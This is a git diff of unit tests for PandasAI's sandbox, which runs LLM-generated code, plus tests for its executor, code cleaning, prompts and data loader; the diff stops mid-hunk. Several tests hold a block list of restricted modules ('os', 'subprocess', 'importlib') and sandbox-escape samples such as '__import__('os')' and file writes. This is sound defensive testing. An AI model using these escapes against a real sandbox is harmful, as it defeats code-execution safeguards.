diff --git a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
new file mode 100644
index 000000000..9c945b983
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
@@ -0,0 +1,146 @@
+import unittest
+from pandasai.core.code_execution.safe_libs.base_restricted_module import (
+ BaseRestrictedModule,
+ SecurityError,
+)
+
+
+class TestBaseRestrictedModule(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for BaseRestrictedModule."""
+ self.module = BaseRestrictedModule()
+
+ def test_wrap_function_allows_safe_arguments(self):
+ """Test that the wrapped function allows safe arguments."""
+
+ @self.module._wrap_function
+ def safe_function(arg1, arg2):
+ return arg1 + arg2
+
+ result = safe_function(1, 2)
+ self.assertEqual(result, 3)
+
+ def test_wrap_function_rejects_restricted_module(self):
+ """Test that the wrapped function rejects a restricted module as an argument."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction("os")
+
+ self.assertEqual(
+ str(context.exception), "Potential security risk: 'os' is not allowed"
+ )
+
+ def test_wrap_function_rejects_restricted_module_in_kwargs(self):
+ """Test that the wrapped function rejects a restricted module in keyword arguments."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction(arg="sys")
+
+ self.assertEqual(
+ str(context.exception), "Potential security risk: 'sys' is not allowed"
+ )
+
+ def test_wrap_class_allows_safe_method(self):
+ """Test that the wrapped class allows safe method calls."""
+
+ class SafeClass:
+ def safe_method(self, arg1, arg2):
+ return arg1 + arg2
+
+ WrappedSafeClass = self.module._wrap_class(SafeClass)
+ instance = WrappedSafeClass()
+
+ # Access the method through the wrapped instance
+ result = instance.safe_method(1, 2)
+ self.assertEqual(result, 3)
+
+ def test_wrap_class_rejects_restricted_method(self):
+ """Test that the wrapped class rejects a restricted method call."""
+
+ class RestrictedClass:
+ def restricted_method(self, arg):
+ return arg
+
+ WrappedRestrictedClass = self.module._wrap_class(RestrictedClass)
+ instance = WrappedRestrictedClass()
+
+ with self.assertRaises(SecurityError) as context:
+ instance.restricted_method("importlib")
+
+ self.assertEqual(
+ str(context.exception),
+ "Potential security risk: 'importlib' is not allowed",
+ )
+
+ def test_wrap_function_with_multiple_arguments(self):
+ """Test that the wrapped function allows multiple safe arguments."""
+
+ @self.module._wrap_function
+ def multi_arg_function(arg1, arg2, arg3):
+ return arg1 * arg2 + arg3
+
+ result = multi_arg_function(2, 3, 4)
+ self.assertEqual(result, 10)
+
+ def test_wrap_function_with_list_argument(self):
+ """Test that the wrapped function allows a list as an argument."""
+
+ @self.module._wrap_function
+ def list_function(my_list):
+ return sum(my_list)
+
+ result = list_function([1, 2, 3])
+ self.assertEqual(result, 6)
+
+ def test_wrap_function_with_dict_argument(self):
+ """Test that the wrapped function allows a dictionary as an argument."""
+
+ @self.module._wrap_function
+ def dict_function(my_dict):
+ return my_dict.get("key", 0)
+
+ result = dict_function({"key": 10})
+ self.assertEqual(result, 10)
+
+ def test_wrap_class_with_inherited_methods(self):
+ """Test that the wrapped class allows inherited method calls."""
+
+ class BaseClass:
+ def base_method(self):
+ return "Base method called"
+
+ class DerivedClass(BaseClass):
+ def derived_method(self):
+ return "Derived method called"
+
+ WrappedDerivedClass = self.module._wrap_class(DerivedClass)
+ instance = WrappedDerivedClass()
+ self.assertEqual(instance.base_method(), "Base method called")
+ self.assertEqual(instance.derived_method(), "Derived method called")
+
+ def test_wrap_function_with_restricted_module_in_args(self):
+ """Test that the wrapped function rejects a restricted module in arguments."""
+
+ @self.module._wrap_function
+ def function_with_restriction(arg):
+ return arg
+
+ with self.assertRaises(SecurityError) as context:
+ function_with_restriction("subprocess")
+
+ self.assertEqual(
+ str(context.exception),
+ "Potential security risk: 'subprocess' is not allowed",
+ )
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_execution/test_code_execution.py b/tests/unit_tests/core/code_execution/test_code_execution.py
new file mode 100644
index 000000000..2981795df
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/test_code_execution.py
@@ -0,0 +1,129 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_execution.code_executor import CodeExecutor
+from pandasai.config import Config
+from pandasai.exceptions import NoResultFoundError
+
+
+class TestCodeExecutor(unittest.TestCase):
+ def setUp(self):
+ self.config = MagicMock(specs=Config)
+ self.executor = CodeExecutor(self.config)
+
+ def test_initialization(self):
+ """Test initialization of CodeExecutor."""
+ self.assertIsInstance(self.executor._environment, dict)
+ self.assertEqual(self.executor._plots, [])
+
+ def test_add_to_env(self):
+ """Test adding a variable to the environment."""
+ self.executor.add_to_env("test_var", 42)
+ self.assertEqual(self.executor._environment["test_var"], 42)
+
+ def test_execute_valid_code(self):
+ """Test executing valid code."""
+ code = "result = 5 + 5"
+ self.executor.execute(code)
+ self.assertEqual(self.executor._environment["result"], 10)
+
+ def test_execute_code_with_variable(self):
+ """Test executing code that defines a variable."""
+ code = "my_list = [1, 2, 3]"
+ self.executor.execute(code)
+ self.assertEqual(self.executor._environment["my_list"], [1, 2, 3])
+
+ def test_execute_and_return_result(self):
+ """Test executing code and returning the result."""
+ code = "result = 3 * 3"
+ result = self.executor.execute_and_return_result(code)
+ self.assertEqual(result, 9)
+
+ def test_execute_and_return_result_no_result(self):
+ """Test execution when no result is returned."""
+ code = "x = 10"
+ with self.assertRaises(NoResultFoundError):
+ self.executor.execute_and_return_result(code)
+
+ def test_execute_and_return_result_with_plot(self):
+ """Test execution with a plot result."""
+ code = "result = {'type': 'plot', 'value': 'my_plot'}"
+ self.executor.execute(code)
+ result = self.executor.execute_and_return_result(code)
+ self.assertEqual(result, {"type": "plot", "value": "my_plot"})
+
+ def test_get_variable_last_line_of_code_assignment(self):
+ """Test extracting variable name from an assignment."""
+ code = "a = 5\nb = 10\nresult = a + b"
+ var_name, subscript = self.executor._get_variable_last_line_of_code(code)
+ self.assertEqual(var_name, "result")
+ self.assertEqual(subscript, None)
+
+ def test_get_variable_last_line_of_code_expression(self):
+ """Test extracting variable name from an expression."""
+ code = "print(5)\nresult = 5 + 5"
+ var_name, _ = self.executor._get_variable_last_line_of_code(code)
+ self.assertEqual(var_name, "result")
+
+ def test_get_variable_last_line_of_code_invalid(self):
+ """Test handling of invalid code syntax."""
+ code = "invalid syntax"
+ var_name = self.executor._get_variable_last_line_of_code(code)
+ self.assertIsNone(var_name)
+
+ def test_get_assign_variable_with_name(self):
+ """Test extracting variable name from an assignment node with a Name target."""
+ assign_node = MagicMock()
+ assign_node.targets = [MagicMock(spec=ast.Name)]
+ assign_node.targets[0].id = "my_var"
+
+ var_name, _ = self.executor._get_assign_variable(assign_node)
+ self.assertEqual(var_name, "my_var")
+
+ def test_get_assign_variable_with_subscript(self):
+ """Test extracting variable name from an assignment node with a Subscript target."""
+ assign_node = MagicMock()
+ subscript_mock = MagicMock(spec=ast.Subscript)
+ subscript_mock.value = MagicMock(spec=ast.Name)
+ subscript_mock.value.id = "subscript_var"
+ subscript_mock.slice = MagicMock(return_value=5)
+ assign_node.targets = [subscript_mock]
+
+ var_name, _ = self.executor._get_assign_variable(assign_node)
+ self.assertEqual(var_name, "subscript_var")
+
+ def test_get_expr_variable_with_name(self):
+ """Test extracting variable name from an expression node with a Name value."""
+ expr_node = MagicMock()
+ expr_node.value = MagicMock(spec=ast.Name)
+ expr_node.value.id = "my_expr"
+
+ var_name, _ = self.executor._get_expr_variable(expr_node)
+ self.assertEqual(var_name, "my_expr")
+
+ def test_get_subscript_variable_with_name_and_slice(self):
+ """Test extracting variable name from a subscript node with a Name value."""
+ subscript_node = MagicMock(spec=ast.Subscript)
+
+ subscript_node.value = MagicMock(spec=ast.Name)
+ subscript_node.value.id = "my_var"
+
+ subscript_node.slice = MagicMock()
+ subscript_node.slice.value = 0
+
+ variable_name, slice_value = self.executor._get_subscript_variable(
+ subscript_node
+ )
+
+ self.assertEqual(variable_name, "my_var")
+ self.assertEqual(slice_value, 0)
+
+ def test_execute_with_syntax_error(self):
+ """Test executing code that raises a syntax error."""
+ code = "result = 5 +"
+ with self.assertRaises(SyntaxError):
+ self.executor.execute(code)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_execution/test_environment.py b/tests/unit_tests/core/code_execution/test_environment.py
new file mode 100644
index 000000000..6d4624f90
--- /dev/null
+++ b/tests/unit_tests/core/code_execution/test_environment.py
@@ -0,0 +1,87 @@
+import unittest
+from unittest.mock import patch, MagicMock
+from pandasai.core.code_execution.environment import (
+ get_environment,
+ import_dependency,
+ get_version,
+)
+from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
+
+
+class TestEnvironmentFunctions(unittest.TestCase):
+ @patch("pandasai.core.code_execution.environment.import_dependency")
+ def test_get_environment_with_secure_mode(self, mock_import_dependency):
+ """Test get_environment function in secure mode."""
+ mock_import_dependency.side_effect = lambda name: MagicMock(name=name)
+ additional_deps = [{"alias": "pd", "module": "pandas", "name": "DataFrame"}]
+ env = get_environment(additional_deps, secure=True)
+
+ self.assertIn("pd", env)
+ self.assertIn("__builtins__", env)
+ self.assertIn("plt", env)
+ self.assertIn("np", env)
+ self.assertIsInstance(env["pd"], RestrictedPandas)
+
+ @patch("pandasai.core.code_execution.environment.import_dependency")
+ def test_get_environment_without_secure_mode(self, mock_import_dependency):
+ """Test get_environment function in non-secure mode."""
+ mock_import_dependency.side_effect = lambda name: MagicMock(name=name)
+ additional_deps = [{"alias": "pd", "module": "pandas", "name": "DataFrame"}]
+ env = get_environment(additional_deps, secure=False)
+
+ self.assertIn("pd", env)
+ self.assertIn("__builtins__", env)
+ self.assertIn("plt", env)
+ self.assertIn("np", env)
+ self.assertIsInstance(env["pd"], MagicMock)
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_success(self, mock_import_module):
+ """Test successful import of a dependency."""
+ mock_import_module.return_value = MagicMock(__version__="1.0.0")
+ module = import_dependency("numpy")
+
+ self.assertIsNotNone(module)
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_missing(self, mock_import_module):
+ """Test handling of a missing dependency."""
+ mock_import_module.side_effect = ImportError("Module not found")
+ with self.assertRaises(ImportError):
+ import_dependency("non_existent_module")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_version_too_old(self, mock_import_module):
+ """Test handling of a dependency with an old version."""
+ mock_import_module.return_value = MagicMock(__version__="0.9.0")
+ with self.assertRaises(ImportError):
+ import_dependency("numpy", min_version="1.0.0")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_import_dependency_with_extra_message(self, mock_import_module):
+ """Test import dependency with additional error message."""
+ mock_import_module.side_effect = ImportError("Module not found")
+ with self.assertRaises(ImportError) as context:
+ import_dependency("non_existent_module", extra="Please install it.")
+
+ self.assertIn("Please install it.", str(context.exception))
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_get_version_success(self, mock_import_module):
+ """Test getting the version of a module successfully."""
+ mock_import_module.return_value = MagicMock(__version__="1.0.0")
+ version = get_version(mock_import_module("numpy"))
+ self.assertEqual(version, "1.0.0")
+
+ @patch("pandasai.core.code_execution.environment.importlib.import_module")
+ def test_get_version_failure(self, mock_import_module):
+ """Test getting version fails when __version__ is not present."""
+ module_mock = MagicMock()
+ module_mock.__name__ = "numpy"
+ mock_import_module.return_value = module_mock
+ with self.assertRaises(ImportError):
+ get_version(mock_import_module("numpy"))
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
new file mode 100644
index 000000000..39c077d39
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -0,0 +1,179 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_generation.code_cleaning import CodeCleaner
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import BadImportError, MaliciousQueryError
+from pandasai.dataframe.base import DataFrame
+
+
+class TestCodeCleaner(unittest.TestCase):
+
+ def setUp(self):
+ # Setup a mock context for CodeCleaner
+ self.context = MagicMock(spec=AgentState)
+ self.cleaner = CodeCleaner(self.context)
+ self.sample_df = DataFrame(
+ {
+ "country": ["United States", "United Kingdom", "Japan", "China"],
+ "gdp": [
+ 19294482071552,
+ 2891615567872,
+ 4380756541440,
+ 14631844184064,
+ ],
+ "happiness_index": [6.94, 7.22, 5.87, 5.12],
+ }
+ )
+
+ def test_check_imports_valid(self):
+ node = ast.Import(names=[ast.alias(name="pandas", asname=None)])
+ result = self.cleaner._check_imports(node)
+ self.assertIsNone(result)
+
+ def test_check_imports_invalid(self):
+ node = ast.Import(names=[ast.alias(name="numpy", asname=None)])
+ with self.assertRaises(BadImportError):
+ self.cleaner._check_imports(node)
+
+ def test_check_is_df_declaration_true(self):
+ node = ast.Call(
+ func=ast.Attribute(
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ attr="DataFrame",
+ ctx=ast.Load(),
+ ),
+ args=[],
+ keywords=[],
+ )
+ node_ast = MagicMock()
+ node_ast.value = node
+ result = self.cleaner._check_is_df_declaration(node_ast)
+ self.assertTrue(result)
+
+ def test_check_is_df_declaration_false(self):
+ node = ast.Call(func=ast.Name(id="list", ctx=ast.Load()), args=[], keywords=[])
+ node_ast = MagicMock()
+ node_ast.value = node
+ result = self.cleaner._check_is_df_declaration(node_ast)
+ self.assertFalse(result)
+
+ def test_get_target_names_single(self):
+ node = ast.Assign(
+ targets=[ast.Name(id="df", ctx=ast.Store())],
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ )
+ target_names, is_slice, target = self.cleaner._get_target_names(node.targets)
+ self.assertEqual(target_names, ["df"])
+ self.assertFalse(is_slice)
+
+ def test_check_direct_sql_func_def_exists_true(self):
+ self.context.config.direct_sql = True
+ node = ast.FunctionDef(
+ name="execute_sql_query",
+ args=ast.arguments(
+ args=[],
+ vararg=None,
+ kwonlyargs=[],
+ kw_defaults=[],
+ kwarg=None,
+ defaults=[],
+ ),
+ body=[],
+ decorator_list=[],
+ returns=None,
+ )
+ result = self.cleaner._check_direct_sql_func_def_exists(node)
+ self.assertTrue(result)
+
+ def test_check_direct_sql_func_def_exists_false(self):
+ self.context.config.direct_sql = False
+ node = ast.FunctionDef(
+ name="execute_sql_query",
+ args=ast.arguments(
+ args=[],
+ vararg=None,
+ kwonlyargs=[],
+ kw_defaults=[],
+ kwarg=None,
+ defaults=[],
+ ),
+ body=[],
+ decorator_list=[],
+ returns=None,
+ )
+ result = self.cleaner._check_direct_sql_func_def_exists(node)
+ self.assertFalse(result)
+
+ def test_replace_table_names_valid(self):
+ sql_query = "SELECT * FROM my_table;"
+ table_names = ["my_table"]
+ allowed_table_names = {"my_table": "my_table"}
+ result = self.cleaner._replace_table_names(
+ sql_query, table_names, allowed_table_names
+ )
+ self.assertEqual(result, "SELECT * FROM my_table;")
+
+ def test_replace_table_names_invalid(self):
+ sql_query = "SELECT * FROM my_table;"
+ table_names = ["my_table"]
+ allowed_table_names = {}
+ with self.assertRaises(MaliciousQueryError):
+ self.cleaner._replace_table_names(
+ sql_query, table_names, allowed_table_names
+ )
+
+ def test_clean_sql_query(self):
+ sql_query = "SELECT * FROM my_table;"
+ mock_dataframe = MagicMock(spec=object)
+ mock_dataframe.name = "my_table"
+ self.cleaner.context.dfs = [mock_dataframe]
+ result = self.cleaner._clean_sql_query(sql_query)
+ self.assertEqual(result, "SELECT * FROM my_table")
+
+ def test_validate_and_make_table_name_case_sensitive(self):
+ node = ast.Assign(
+ targets=[ast.Name(id="query", ctx=ast.Store())],
+ value=ast.Constant(value="SELECT * FROM my_table"),
+ )
+ mock_dataframe = MagicMock(spec=object)
+ mock_dataframe.name = "my_table"
+ self.cleaner.context.dfs = [mock_dataframe]
+ updated_node = self.cleaner._validate_and_make_table_name_case_sensitive(node)
+ self.assertEqual(updated_node.value.value, "SELECT * FROM my_table")
+
+ def test_extract_fix_dataframe_redeclarations(self):
+ node = ast.Assign(
+ targets=[ast.Name(id="df", ctx=ast.Store())],
+ value=ast.Call(
+ func=ast.Attribute(
+ value=ast.Name(id="pd", ctx=ast.Load()),
+ attr="DataFrame",
+ ctx=ast.Load(),
+ ),
+ args=[],
+ keywords=[],
+ ),
+ )
+ self.cleaner.context.dfs = [self.sample_df]
+ code_lines = [
+ """df = pd.DataFrame({
+ "country": ["United States", "United Kingdom", "Japan", "China"],
+ "gdp": [
+ 19294482071552,
+ 2891615567872,
+ 4380756541440,
+ 14631844184064,
+ ],
+ "happiness_index": [6.94, 7.22, 5.87, 5.12],
+ })"""
+ ]
+ additional_deps = []
+ updated_node = self.cleaner.extract_fix_dataframe_redeclarations(
+ node, code_lines, additional_deps
+ )
+ self.assertIsInstance(updated_node, ast.AST)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_security.py b/tests/unit_tests/core/code_generation/test_code_security.py
new file mode 100644
index 000000000..a34c56477
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_security.py
@@ -0,0 +1,94 @@
+import unittest
+from unittest.mock import MagicMock
+from pandasai.core.code_generation.code_security import CodeSecurityChecker
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import MaliciousCodeGenerated
+
+
+class TestCodeSecurityChecker(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for CodeSecurityChecker."""
+ self.context = MagicMock(spec=AgentState)
+ self.security_checker = CodeSecurityChecker(self.context)
+
+ def test_is_malicious_code_with_dangerous_module(self):
+ """Test detection of malicious code with a dangerous module."""
+ code = "import os"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_is_malicious_code_with_restricted_import(self):
+ """Test detection of malicious code with a restricted import."""
+ code = "from os import mkdir"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_is_malicious_code_with_private_attribute_access(self):
+ """Test detection of malicious code with private attribute access."""
+ code = "obj._private_method()"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception),
+ "Access to private attribute '_private_method' is not allowed.",
+ )
+
+ def test_is_jailbreak_with_dangerous_builtin(self):
+ """Test detection of jailbreak methods."""
+ code = "__import__('os')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(str(context.exception), "Restricted builtins are used!")
+
+ def test_is_unsafe_with_unsafe_method(self):
+ """Test detection of unsafe operations."""
+ code = "df.to_csv('file.csv')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception),
+ "The code is unsafe and can lead to I/O operations or other malicious operations that are not permitted!",
+ )
+
+ def test_check_with_safe_code(self):
+ """Test that safe code passes without raising an error."""
+ code = "x = 5 + 5"
+ try:
+ self.security_checker.check(code)
+ except MaliciousCodeGenerated:
+ self.fail("check() raised MaliciousCodeGenerated unexpectedly!")
+
+ def test_check_with_multiple_checks(self):
+ """Test multiple checks in one code block."""
+ code = "import os\nx = 5\nobj._private_method()"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_check_with_jailbreak_and_unsafe_methods(self):
+ """Test detection of both jailbreak and unsafe methods in one code block."""
+ code = "__import__('os')\ndf.to_excel('file.xlsx')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(str(context.exception), "Restricted builtins are used!")
+
+ def test_check_with_multiple_restricted_imports(self):
+ """Test detection of multiple restricted imports."""
+ code = "import os\nfrom restricted_lib import something"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_validation.py b/tests/unit_tests/core/code_generation/test_code_validation.py
new file mode 100644
index 000000000..469efd695
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_validation.py
@@ -0,0 +1,72 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_generation.code_validation import CodeRequirementValidator
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import ExecuteSQLQueryNotUsed
+
+
+class TestCodeRequirementValidator(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for CodeRequirementValidator."""
+ self.context = MagicMock(spec=AgentState)
+ self.context.config.direct_sql = False # Default to False
+ self.validator = CodeRequirementValidator(self.context)
+
+ def test_validate_code_without_execute_sql_query(self):
+ """Test validation when direct_sql is enabled but execute_sql_query is not used."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = "result = 5 + 5" # Code without execute_sql_query
+
+ with self.assertRaises(ExecuteSQLQueryNotUsed) as context:
+ self.validator.validate(code)
+
+ self.assertEqual(
+ str(context.exception),
+ "The code must execute SQL queries using the `execute_sql_query` function, which is already defined!",
+ )
+
+ def test_validate_code_with_execute_sql_query(self):
+ """Test validation when execute_sql_query is used."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = "execute_sql_query('SELECT * FROM table')" # Code with execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_no_direct_sql(self):
+ """Test validation when direct_sql is disabled."""
+ self.context.config.direct_sql = False # Disable direct_sql
+ code = "result = 5 + 5" # Any code should pass
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_function_calls(self):
+ """Test validation with various function calls."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = """
+def some_function():
+ pass
+some_function()
+execute_sql_query('SELECT * FROM table')
+""" # Code with a function call and execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_multiple_calls(self):
+ """Test validation with multiple function calls."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = """
+import pandas as pd
+df = pd.DataFrame()
+execute_sql_query('SELECT * FROM table')
+""" # Code with pandas and execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/prompts/test_prompts.py b/tests/unit_tests/core/prompts/test_prompts.py
new file mode 100644
index 000000000..2ad31d953
--- /dev/null
+++ b/tests/unit_tests/core/prompts/test_prompts.py
@@ -0,0 +1,93 @@
+import unittest
+from unittest.mock import MagicMock
+from pandasai.core.prompts import (
+ get_chat_prompt,
+ get_chat_prompt_for_sql,
+ get_correct_error_prompt,
+ get_correct_error_prompt_for_sql,
+ get_correct_output_type_error_prompt,
+)
+from pandasai.agent.state import AgentState
+from pandasai.core.prompts.base import BasePrompt
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
+from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
+ CorrectExecuteSQLQueryUsageErrorPrompt,
+)
+from pandasai.core.prompts.correct_output_type_error_prompt import (
+ CorrectOutputTypeErrorPrompt,
+)
+
+
+class TestChatPrompts(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for chat prompts."""
+ self.context = MagicMock(spec=AgentState)
+ memory = MagicMock()
+ memory.count.return_value = 1
+ self.context.memory = memory
+
+ def test_get_chat_prompt(self):
+ """Test the get_chat_prompt function."""
+ self.context.config.data_viz_library = "seaborn"
+ self.context.output_type = "dataframe"
+
+ prompt = get_chat_prompt(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+
+ self.assertEqual("seaborn" in prompt.to_string(), True)
+
+ def test_get_chat_prompt_default_viz_lib(self):
+ """Test get_chat_prompt with default visualization library."""
+ self.context.config.data_viz_library = None
+ self.context.output_type = "dataframe"
+
+ prompt = get_chat_prompt(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+ self.assertEqual("matplotlib" in prompt.to_string(), True)
+
+ def test_get_chat_prompt_for_sql(self):
+ """Test the get_chat_prompt_for_sql function."""
+ self.context.config.data_viz_library = "plotly"
+ self.context.output_type = "sql"
+
+ prompt = get_chat_prompt_for_sql(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+ self.assertEqual("plotly" in prompt.to_string(), True)
+
+ def test_get_correct_error_prompt(self):
+ """Test the get_correct_error_prompt function."""
+ code = "some code"
+ traceback_error = "Some traceback error"
+
+ prompt = get_correct_error_prompt(self.context, code, traceback_error)
+
+ self.assertIsInstance(prompt, CorrectErrorPrompt)
+
+ def test_get_correct_error_prompt_for_sql(self):
+ """Test the get_correct_error_prompt_for_sql function."""
+ code = "SELECT * FROM table"
+ traceback_error = "SQL error"
+
+ prompt = get_correct_error_prompt_for_sql(self.context, code, traceback_error)
+
+ self.assertIsInstance(prompt, CorrectExecuteSQLQueryUsageErrorPrompt)
+
+ def test_get_correct_output_type_error_prompt(self):
+ """Test the get_correct_output_type_error_prompt function."""
+ code = "some code"
+ traceback_error = "Output type error"
+
+ self.context.output_type = "expected_output_type"
+
+ prompt = get_correct_output_type_error_prompt(
+ self.context, code, traceback_error
+ )
+
+ self.assertIsInstance(prompt, CorrectOutputTypeErrorPrompt)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/dataframe/test_dataframe.py b/tests/unit_tests/dataframe/test_dataframe.py
index b20bed5c3..810d9b956 100644
--- a/tests/unit_tests/dataframe/test_dataframe.py
+++ b/tests/unit_tests/dataframe/test_dataframe.py
@@ -2,7 +2,7 @@
import pandas as pd
from unittest.mock import Mock, patch
from pandasai.dataframe.base import DataFrame
-from pandasai.agent.agent import Agent
+from pandasai.agent import Agent
import pandasai
@@ -31,20 +31,16 @@ def test_dataframe_initialization(self, sample_data, sample_df):
assert isinstance(sample_df, pd.DataFrame)
assert sample_df.equals(pd.DataFrame(sample_data))
- def test_from_pandas(self, sample_data):
- pandas_df = pd.DataFrame(sample_data)
- pandasai_df = DataFrame.from_pandas(pandas_df)
- assert isinstance(pandasai_df, DataFrame)
- assert pandasai_df.equals(pandas_df)
-
def test_dataframe_operations(self, sample_df):
assert len(sample_df) == 5
assert list(sample_df.columns) == ["Name", "Age", "City", "Salary"]
assert sample_df["Salary"].mean() == 76800
- @patch("pandasai.agent.agent.Agent")
- def test_chat_creates_agent(self, mock_agent, sample_df):
- assert sample_df._agent is None
+ @patch("pandasai.agent.Agent")
+ @patch("os.environ")
+ def test_chat_creates_agent(self, mock_env, mock_agent, sample_data):
+ sample_df = DataFrame(sample_data)
+ mock_env.return_value = {"PANDASAI_API_URL": "localhost:8000"}
sample_df.chat("Test query")
mock_agent.assert_called_once_with([sample_df], config=sample_df.config)
@@ -81,7 +77,7 @@ def test_chat_method(self, sample_df):
def test_chat_with_config(self, sample_df):
config = {"max_retries": 100}
- with patch("pandasai.agent.agent.Agent") as mock_agent:
+ with patch("pandasai.agent.Agent") as mock_agent:
sample_df.chat("Test query", config=config)
mock_agent.assert_called_once_with([sample_df], config=sample_df.config)
assert sample_df.config.max_retries == 100
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 68800eeb8..4bb1b1591 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -60,7 +60,7 @@ def test_load_from_cache(self, sample_schema):
with patch("os.path.exists", return_value=True), patch(
"os.path.getmtime", return_value=pd.Timestamp.now().timestamp()
), patch(
- "pandasai.dataframe.loader.DatasetLoader._read_cache"
+ "pandasai.data_loader.loader.DatasetLoader._read_csv_or_parquet"
) as mock_read_cache, patch(
"builtins.open", mock_open(read_data=str(sample_schema))
):
@@ -116,7 +116,7 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.schema = sample_schema
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path == "datasets/test/users/users.parquet"
+ assert cache_path.endswith("datasets/test/users/users.parquet")
def test_get_cache_file_path_without_destination_path(self, sample_schema):
schema_without_path = sample_schema.copy()
@@ -125,7 +125,7 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.schema = schema_without_path
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path == "datasets/test/users/data.parquet"
+ assert cache_path.endswith("datasets/test/users/data.parquet")
def test_is_cache_valid(self, sample_schema):
loader = DatasetLoader()
@@ -154,7 +154,7 @@ def test_read_cache_parquet(self, sample_schema):
mock_df = pd.DataFrame({"col1": [1, 2, 3], "col2": ["a", "b", "c"]})
with patch("pandas.read_parquet", return_value=mock_df):
- result = loader._read_cache("dummy_path")
+ result = loader._read_csv_or_parquet("dummy_path", "parquet")
assert isinstance(result, pd.DataFrame)
assert result.equals(mock_df)
@@ -166,7 +166,7 @@ def test_read_cache_csv(self, sample_schema):
mock_df = pd.DataFrame({"col1": [1, 2, 3], "col2": ["a", "b", "c"]})
with patch("pandas.read_csv", return_value=mock_df):
- result = loader._read_cache("dummy_path")
+ result = loader._read_csv_or_parquet("dummy_path", "csv")
assert isinstance(result, pd.DataFrame)
assert result.equals(mock_df)
@@ -176,8 +176,8 @@ def test_read_cache_unsupported_format(self, sample_schema):
loader = DatasetLoader()
loader.schema = schema_unsupported
